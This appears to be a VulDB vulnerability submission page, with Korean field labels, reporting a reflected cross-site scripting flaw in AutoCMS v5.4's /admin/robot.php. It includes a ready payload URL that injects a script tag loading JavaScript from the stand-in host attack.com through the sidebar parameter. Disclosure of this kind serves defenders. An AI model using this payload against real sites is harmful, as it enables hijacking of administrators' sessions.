| 제목 | AutoCMS v5.4 Cross Site Scripting |
|---|
| 설명 | Summary
AutoCMS v5.4 was discovered to contain a XSS vulnerability via the sidebar parameter at /admin/robot.php.
Affected Component: /admin/robot.php
Description: The application fails to sufficiently sanitize and escape input parameters page and sidebar. An attacker can craft a malicious URL that, when accessed by an administrator, will execute arbitrary JavaScript code.
Payload:
http(s)://target-ip/admin/robot.php?page=1&sidebar=1%22%3E%3CsCRiPt/SrC=//attack.com/1.js%3E
|
|---|
| 원천 | ⚠️ https://github.com/Hebing123/cve/issues/68 |
|---|
| 사용자 | jiashenghe (UID 39445) |
|---|
| 제출 | 2024. 09. 13. AM 05:22 (2 연령 ago) |
|---|
| 모더레이션 | 2024. 09. 14. AM 08:43 (1 day later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 277503 [AutoCMS 5.4 /admin/robot.php sidebar 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 20 |
|---|